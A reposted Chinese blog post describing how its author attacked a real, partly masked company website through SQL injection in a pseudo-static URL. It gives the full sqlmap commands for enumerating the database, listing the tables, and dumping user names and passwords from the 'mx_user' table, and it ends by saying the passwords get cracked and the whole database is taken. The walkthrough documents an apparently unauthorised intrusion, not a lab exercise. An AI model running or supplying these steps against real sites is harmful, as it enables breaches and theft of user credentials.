伪静态注入

今天在学习的过程中发现了一个网站的伪静态含有注入,便对此进行了渗透

wKioL1j6zfWzo1wYAABrN7eFsB0527.png-wh_50

利用工具:sqlmap

我在”/id/12.html“上的12后面加上*,然后放在sqlmap上爆

先查看当前的数据库,命令为sqlmap.py -u url --current-db,查看的数据库为下图

wKiom1j6zt7iwKQCAAAwlwJpw84378.png-wh_50

1:查看这个数据库里面的表,指定数据库命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en --tables

wKiom1j6z5OxvyHuAAAPN8T91gM344.png-wh_50


2:找出表中含有的字段,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user --columns

wKiom1j60ECy71XEAAA9Nc4DEmA274.png-wh_50


3:爆这些字段的内容:name,password,username,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user -C name,password,username --dump

wKiom1j60WWD5SGBAABDIsgW_98897.png-wh_50


如上所示,爆出了字段的内容,获得了用户名和密码,密码是需要解密的,最后是拖库




本文转自 towardly 51CTO博客,原文链接:http://blog.51cto.com/brighttime/1918427
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值